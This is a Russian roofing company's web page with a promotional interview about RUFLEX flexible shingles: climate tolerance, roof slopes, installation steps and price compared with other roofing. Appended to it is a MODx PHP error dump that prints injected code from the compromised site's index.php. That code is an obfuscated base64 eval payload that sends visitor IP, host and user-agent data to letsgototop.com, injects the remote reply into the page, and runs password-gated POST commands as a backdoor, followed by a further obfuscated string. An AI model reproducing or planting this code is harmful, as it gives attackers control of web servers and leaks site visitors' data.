Гибкая
черепица
+7 (495) 234-41-41
8 (800) 234-41-10
заказать звонок
Вконтакте Twitter Facebook Youtube
Рус / Eng

11/08/2008. Во что одеть «пятый фасад» вашего дома…

Если Вы строитель или задумались о строительстве собственного дома, наша статья поможет узнать больше о возможностях гибкой черепицы для «пятого фасада» дома – его крыше.


С каждым годом потребителю все сложнее определиться с выбором кровельного покрытия. Разнообразная цветовая гамма и всевозможные формы современных кровельных материалов превращают крышу дома в произведение искусства. Не удивительно, что на сегодняшний день одним из самых популярных материалов у потребителей является гибкая черепица. Эксплуатационные качества и дизайн этого материала завоевывают все большее количество поклонников. На самые популярные вопросы, которые задают потребители гибкой черепицы, отвечает начальник отдела продаж компании ЗАО «Диана-Строй» (строительно-монтажные работы и продажа кровельных и строительных материалов) Григорий Михайлов.

- Я слышала о том, что гибкая черепица - это многофункциональный вариант в том плане, что ее можно укладывать в любом климате - и в южных городах, где стоит жаркая погода и на севере, где большую часть года морозы. Но у меня, все-таки, возникают сомнения относительно правдивости этого высказывания… Ведь, как известно, идеальных материалов во всех отношениях не бывает. Насколько все же гибкая черепица подходит для климатических условий различных регионов России?

Григорий Михайлов (Г.М.): При выборе гибкой черепицы обратите внимание на наличие в ее составе модификаторов, а также на типы используемого битума. Использование только окисленного битума в производстве приводит к появлению трещин при эксплуатации, которые являются причиной деформации покрытия, а это, в свою очередь, значительно сокращает срок эксплуатации и приводит к необходимости ремонта кровли.

Я могу с уверенностью сказать, что черепица RUFLEX выдерживает самый широкий диапазон температур от -55 град. С до +110 град. С, а это очень важно в российских условиях эксплуатации. Такое свойство гибкой черепицы обеспечивается за счет использования СБС - модифицированного битума (стирол-бутадиен-стирол), именно он обеспечивает высокую степень эластичности черепицы даже при минусовой температуре, что подтверждается эксплуатацией гибкой черепицы в условиях сурового климата севера.

В этом материале мы абсолютно уверены, его высокое качество подтверждает сертификат и гарантия производителя в течение 25 лет!

- Что вы можете сказать по поводу крыш, для которых подходит такой кровельный материал, как гибкая черепица?

Г.М.: Гибкая черепица - это кровельный материал для скатных кровель с уклоном от 11,3 до 90 град. любой сложности. На плоских кровлях гибкая черепица не используется.

- Какие условия необходимы для качественного монтажа гибкой черепицы и как правильно провести работу по ее укладке?

Г.М.: Молоток, гвозди, отсутствие дождя и 2 пары умелых рук.… Если серьезно, монтаж гибкой черепицы провести действительно несложно, но есть множество нюансов, о которых знают только профессионалы. Главное, чтобы не было дождя и снега, тогда можно приступать к укладке. Например, несущие конструкции Вашего дома в порядке, организован вентиляционный зазор, уложены утеплитель и пароизоляционный слой. Можно укладывать сплошную обрешетку, которая необходима для монтажа гибкой черепицы, ею может служить фанера, ОСП (ориентированно - стружечная плита), шпунтованная или обрезная доска. Важно чтобы все листы были одинаковой влажности и не выше 20 %, в противном случае при высыхании они будут волнообразно деформироваться и покрытие гибкой черепицы будет неровным. Следующим этапом укладываем подкладочный ковер, он выравнивает поверхность и служить дополнительной гидроизоляцией. После этого можно приступить к укладке рядовой черепицы. Нижний участок черепицы приклеивается, а верхняя часть гонта фиксируется гвоздями, они, в свою очередь, закрываются следующим лепестками. В итоге получается монолитное покрытие.

- Не так давно я узнала, что покрытие крыши, - это не только покупка кровельного материала, но и других доборных элементов, без которых нельзя обойтись…Какие комплектующие необходимо использовать для укладки гибкой черепицы?

Г.М.: Действительно, для устройства любой кровли необходимы доборные элементы в зависимости от кровельного покрытия, которое Вы выберете. Если речь идет о гибкой черепице, то к ним можно отнести: гвозди, подкладочный ковер, клей, если он необходим. Есть еще и такие элементы, как карнизная и коньковая плитка, которые обеспечат защиту кровли от влаги и ветра и улучшат внешний вид. Ендовый ковер, защитит наиболее уязвимые участки крыши - зоны внутренних перегибов, позволит избежать протечек. Эти, на первый взгляд, незначительные элементы делают всю кровлю более надежной и красивой.

- Монтаж, реконструкция - это процесс без конца и без края…. Скажите, как много времени уйдет на то, чтобы смонтировать гибкую черепицу, насколько тяжелая задача стоит перед строителями?

Г.М.: Для примера, недавно мы закончили монтаж простой двухскатной крыши площадью 60 кв. м. за 2 дня. На самом деле, все зависит от сложности конструкции крыши. Они могут быть с множеством окон, башенок, изгибов и т.д., исходя из этих параметров, кровельщик определит срок монтажа. Если это двухскатная крыша средней сложности и площадью 100 кв. м., то ее монтаж займет от 3-х дней до одной недели, в зависимости от погоды и рабочего времени.

- По каким причинам вам приходится проводить реконструкцию кровель, покрытых гибкой черепицей?

Г.М.: Если работу выполняли профессиональные кровельщики, таким материалом как RUFLEX, то ремонт ей не нужен на протяжении, как минимум, 25 лет, доказательством этому служит гарантия качества на материал, а главное, отсутствие рекламаций со стороны потребителей.

Другое дело, если к работе привлекались неквалифицированные «кровельщики», которые при укладке черепицы не выполнили все правила монтажа, тогда могут возникнуть и протечки, и нарушение работы других слоев. Например, после произведенного монтажа на крышу решили установить антенну, а швы при этом не загерметизировали, в конечном итоге, это приведет к протечкам.

- Потребители какой категории могут позволить себе покрытие дома гибкой черепицей?

Г.М.: Я считаю, что по соотношению цены и качества гибкая черепица - идеальный вариант. Всегда можно выбрать из предложенных вариантов коллекций, форм и оттенков, который понравится Вам внешне и подойдет по цене.

- У каждого покрытия есть свои плюсы и минусы, как Вы считаете, в чем гибкая черепица превосходит другие кровельные материалы, а в чем уступает?

Г.М.: Существует множество кровельных материалов, например, керамическая черепица - это кровельный материал, который многие хотели бы видеть на крышах своих домов, но его могут позволить себе единицы из-за достаточно высокой стоимости. Кроме того, если вы хотите покрытие натуральной черепицей, нужно позаботиться об этом еще на этапе строительства. Необходимо предусмотреть мощный каркас здания, несущие стены и, конечно, сама конструкция крыши, т.к. вес натуральной черепицы очень высок.

Металл, вопреки бытующему мнению, не дешевле гибкой черепицы, к тому же, отходы после монтажа такого материала составляют от 15% до 60% в зависимости от сложности кровли.

Гибкая черепица сочетает в себе высокое качество, долгий срок эксплуатации и эстетическую красоту за приемлемую цену.

- Какие аргументы в пользу гибкой черепицы для потребителей являются решающими?

Г.М.: Такие аргументы, как гарантия производителя на свой продукт в течение 25 лет и отсутствие рекламаций со стороны клиентов, за все годы производства гибкой черепицы RUFLEX, лучше всего говорят в пользу этого материала. Тем более, если вы видели гибкую черепицу на домах, то другие аргументы вам уже не нужны!

Мы в:
MODx Content Manager 32 »

« MODx Parse Error »

MODx encountered the following error while attempting to parse the requested resource:
« PHP Parse Error »
 
PHP error debug
  Error: assert() [function.assert]: Assertion "eval(base64_decode("aWYgKCFpc3NldCgkaWJ2KSkgeyAgQGluaV9zZXQoImRpc3BsYXlfZXJyb3JzIixmYWxzZSk7QGVycm9yX3JlcG9ydGluZygwKTsKaWYoIWVtcHR5KCRfQ09PS0lFWyJjbGllbnRfY2hlY2siXSkgJiYgZW1wdHkoJGlidikpIHsgJGlidiA9ICRfQ09PS0lFWyJjbGllbnRfY2hlY2siXTsgIGVjaG8gJGlidjt9IGVsc2VpZiAoZW1wdHkoJGlidikpIHsKaWYgKHN0cnN0cigkX1NFUlZFUlsiSFRUUF9IT1NUIl0sICIxMjcuMCIpKXskbmFtZSA9ICRfU0VSVkVSWyJTRVJWRVJfQUREUiJdO31lbHNleyRuYW1lID0gJF9TRVJWRVJbIkhUVFBfSE9TVCJdO30KJHVzZXJhID0gaXNzZXQoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKT91cmxlbmNvZGUoJF9TRVJWRVJbIkhUVFBfVVNFUl9BR0VOVCJdKToiIjsKJHVybCA9ICJodHRwOi8vbGV0c2dvdG90b3AuY29tL2dldC5waHA/aXA9Ii51cmxlbmNvZGUoJF9TRVJWRVJbIlJFTU9URV9BRERSIl0pLiImZD0iLnVybGVuY29kZSgkbmFtZS4kX1NFUlZFUlsiUkVRVUVTVF9VUkkiXSkuIiZ1PSIuJHVzZXJhLiImaT0xJmg9Ii5tZDUoIjRmNGQzYjhlNzBmYzNkODJhN2VjN2VhNWU2ODk1Y2FhMTEiKTsKaWYoZnVuY3Rpb25fZXhpc3RzKCJjdXJsX2luaXQiKSkgewokY2ggPSBjdXJsX2luaXQoJHVybCk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9IRUFERVIsIEZBTFNFKTtjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfQ09OTkVDVFRJTUVPVVQsIDUpOyBjdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVElNRU9VVCwgNSk7CmN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9SRVRVUk5UUkFOU0ZFUiwgVFJVRSk7CiRpYnYgPSBjdXJsX2V4ZWMoJGNoKTskaW5mbyA9IGN1cmxfZ2V0aW5mbygkY2gpO2lmICgkaW5mb1siaHR0cF9jb2RlIl0hPTIwMCl7JGlidj0iIjt9CmN1cmxfY2xvc2UoJGNoKTsKfSBlbHNlaWYoaW5pX2dldCgiYWxsb3dfdXJsX2ZvcGVuIikgPT0gMSkgewokaWJ2ID0gZmlsZV9nZXRfY29udGVudHMoJHVybCk7Cn0KaWYoIWVtcHR5KCRfUE9TVFsicCJdKSAmJiBtZDUobWQ1KCRfUE9TVFsicCJdKSkgPT0gIjNmMTFlNmE0MmJjMWQ4MDE2MDUwMzEyYzc4OWRkNzFmIikgeyBAZXZhbChzdHJpcHNsYXNoZXMoJF9QT1NUWyJjIl0pKTsgfQplY2hvICRpYnY7Cn0gfQ=="));" failed 
  Error type/ Nr.: Warning - 2 
  File: /home/u199389/ruflex.ru/www/index.php 
  Line: 139 
  Line 139 source: $light = $strings2($gbz.'("nJLtXPScp3AyqPtxnJW2XFxtrlNtDTyhnI9mMKDbVzEcp3OfLKysMKWlo3WmVvkzLJkmMFx7DTIlpz9lK3WypT9lqTyhMltjXGfXnJLbVJIgpUE5XPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKFxtWvLtMJ1jqUxbWTyvqvxcVUftWTyvqvN9VPEsD09CF0ySJlWwoTyyoaEsL2uyL2fvKGftVTIwnT8tWTyvqwg9VTIfp2IcMvNbMJ1jqUxbWTyvqvxcVUfXnJLtXUA0paA0pvtxK1ASHyMSHyfvFSEHHS9VG1AHVy0fVPVkZwphZPVcXKfxozSgMFN9VPEsH0IFIxIFJlWGEIWJEIWsDHERHvWqB31yoUAyrlEhLJ1yVQ0tWS9GEIWJEIWoVxuHISOsFR9GIPWqB30XWUImMKWuVQ0tnKAmMKDbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXG91pzkyozAiMTHbWS9GEIWJEIWoVxuHISOsIIASHy9OE0IBIPWqXGbvVwfXWUIloPN9VPWbqUEjBv8ioTI0p2qiqT90o3NhL29gY2qyqP5jnUN/nKN9Vv51pzkyozAiMTHbWS9GEIWJEIWoVyWSGH9HEI9OEREFVy0cYvVzMQ0vYaIloTIhL29xMFtxozSgMF4xK1ASHyMSHyfvHxIEIHIGIS9IHxxvKFxhVvM1CFVhWUImMKWuYvVznG0kWzt9Vv5gMQHbVwEzATDmLwuyAmOzLmAxBQWuA2IwA2IuAJH2BQx1L2SuZGRvXGfXnJLbMaIhL3Eco25sMKucp3EmXPWwqKWfK2yhnKDvXFxtrjbxL2ttCFOwqKWfK2yhnKDbWUIloPx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9VEHSREIVfVRMOGSASXGgwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsD09BGxIQISEWGHICIIDfVQHcBlOwqKWfK3AyqT9jqPtxL2tfVRAIHxkCHSEsIRyAEH9IIPjtAFx7PzA1pzksp2I0o3O0XPEwnPjtD1IFGR9DIS9FEIEIHx5HHxSBH0MSHvjtISWIEFx7PvEcLaLtCFOwqKWfK2I4MJZbWTAbXGfxnJ5zolN9VTA1pzksM2I0nJ5zoltxL2tcB2yzVPtxnJ5zo1fvnUE0pS9wo2EyVy0uCGVjZPy7WTyvqw0vVwg9PzA1pzksL2kip2HbWTAbXGfXsFOyoUAynJLbnJ5cK2qyqPtvLJkfo3qsqKWfK2MipTIhVvxtCG0tZFxtrjbxnJW2VQ0tMzyfMI9aMKEsL29hqTIhqUZbWUIloPx7Pa0XnJLbVJIgpUE5XPEsHR9GISfvpPWqXFNzWvOgMQHboJD1XPEsHR9GISfvpPWqXFxtCG0tVwAzZGSyAzR0ZzWwZJD4ZQR2ZQHjZmRlLmp4BJExAmSzVvxtrlONMKMuoPumqUWcpUAfLKAbMKZbWS9DG1AHJlWwVy0cXGftsDcyL2uiVPEcLaL7Pa0tsD=="));'); $strings($light); ?> 
 
Parser timing
  MySQL: 0.0033 s(1 Requests)
  PHP: 0.6560 s 
  Total: 0.6593 s